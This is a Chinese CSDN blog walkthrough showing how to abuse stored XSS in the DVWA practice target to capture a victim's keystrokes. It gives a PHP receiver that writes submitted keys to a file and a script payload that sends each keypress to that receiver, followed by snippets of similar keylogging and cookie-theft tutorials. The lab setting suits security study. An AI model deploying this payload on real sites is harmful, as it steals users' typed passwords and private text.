利用XSS实现受害者的键盘记录

最新推荐文章于 2023-01-26 21:42:31 发布
最新推荐文章于 2023-01-26 21:42:31 发布
阅读量250 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51356351/article/details/109757997
版权

实验环境:

PHPstudy
DVWA靶场

实验步骤:

1、在www目录下创建一个名为keylog.php的文件,代码如下:

<?php
$file = fopen("key.txt","a");
if(isset($_REQUEST['key'])) {
	$key = $_REQUEST['key'];
	fputs($file,$key);
}
?>

2、进入DVWA靶机,级别调成low,选择(XSS)stored

3、F12打开查看器,将输入限制值改的大一点
在这里插入图片描述

4、将

<script>document.onkeydown=function(ev){xhr=new XMLHttpRequest();xhr.open('POST','http://localhost/keylog.php',true);xhr.setRequestHeader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>

插入执行

5、然后输入内容,key.txt中就会出现记录
在这里插入图片描述

weixin_51356351
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1386
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1134
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
漏洞复现篇——利用XSS漏洞实现键盘记录
爱国小白帽
02-21 1783
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 实验准备: 在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key); } ?> 模拟实验...
xss-键盘记录
weixin_46164380的博客
03-08 208
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
XSS漏洞利用---键盘记录
Ethan024的博客
03-13 460
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备: 皮卡丘靶场; 存在存储型xss漏洞的网页; pkxss键盘记录后台; 实验步骤: 4. 嵌入恶意的js标签 — src=“http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js” 5. 在输入框中输入字符串:111111并查看后台,发现已经记录。 Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin. ...
XSS键盘记录和cookie获取
最新发布
Williamanddog的博客
01-26 1797
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
XSS介绍及利用
世间繁华梦一出
11-27 3476
XSS——跨站脚本攻击XSS介绍及利用 XSS介绍及利用 1、XSS介绍 XSS(cross site scripting)跨站脚本攻击, 恶意攻击者往web页面里插入恶意script代码,当用户浏览该页面时,代码就会被执行 2、XSS原理 在HTML中常用到字符实体,对常用到的字符实体没有进行转译,导致完整的标签出现,在可输入的文本框等某些区域内输入特定的某些标签导致代码被恶意篡改。 3、实现过程 (1)攻击者将恶意代码插入到服务器 (2)其他用户无防备的情况下访问服务器 (3)服务器对含有恶意代码的网页
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5625
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
xss靶机训练【实现弹窗即成功】
Miracle_ze的博客
07-29 3842
xss的绕过
XSS详解
聚鼎安全
01-20 726
目录XSS简介XSS漏洞分类XSS漏洞攻击过程XSS漏洞危害XSS漏洞的挖掘XSS利用方式XSS过滤绕过XSS防御方式XSS工具手工挖掘工具自动化工具 XSS简介 跨站脚本攻击—XSS(Cross Site Script),是指攻击者通过在Web页面中写入恶意脚本,造成用户在浏览页面时,控制用户浏览器进行操作的攻击方式,该漏洞发生在用户端,在渲染过程中发生了不在预期过程中的JavaScript代码执行。假设,在一个服务端上,有一处功能使用了这段代码,他的功能是将用户输入的内容输出到页面上,很常见的一个功能。
键盘记录者 帮你记录自己计算机上所发生的一切
09-19
帮你记录自己计算机上所发生的一切 绝对值得下的东西
键盘记录查看者
12-12
键盘记录查看者 软件介绍: 能够将计算机用户的键盘输入及汉字输入全部记录下来。适用于所有应用程序,例如QQ,MSN, office,记事本,写字板,IE网页等任何键盘输入程序。广泛用于个人信息记录,家长对孩子的管教和企业对员工的工作监督,计算机教室,网吧的监控与管理。
万能键盘记录
06-03
haodongxihdhahdiahdia
键盘记录击键记录器(键盘木马)
04-22
 Master Keystroke Logger是一款键盘记录击键记录器。可让您了解其他人在你的电脑做了什么,它是专为隐藏的计算机监控和计算机活动监控。(英文版。需较强的英文功底才可使用)
键盘鼠标记录大师深度专版
11-16
键盘鼠标记录大师深度专版 键盘鼠标记录大师深度专版 键盘鼠标记录大师深度专版
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1684
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 494
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
xss获取键盘记录实验演示
北冥有鱼
04-20 1439
在实验之前,我们首先来了解一下什么事跨域 跨域-同源策略 为什么要有同源策略 没有的话只需要一个url就可以盗取你的信息了,不需要xss漏洞 我们来到pikachu,进入xss的存储型 我们首先来看一下后台,在pikachu xss的后台有键盘记录这么一个目录 我们需要去嵌入一个能够调用我们的远程js的方法 把这段代码放进去,点提交后,这个js就被嵌入到这个页面中了 我们打开控制台...
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1036
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
XSS漏洞利用深度解析
"xss利用与挖掘" XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上注入恶意脚本。通过XSS攻击,攻击者能够窃取用户的敏感信息,如cookies,或者控制用户的浏览器行为,例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值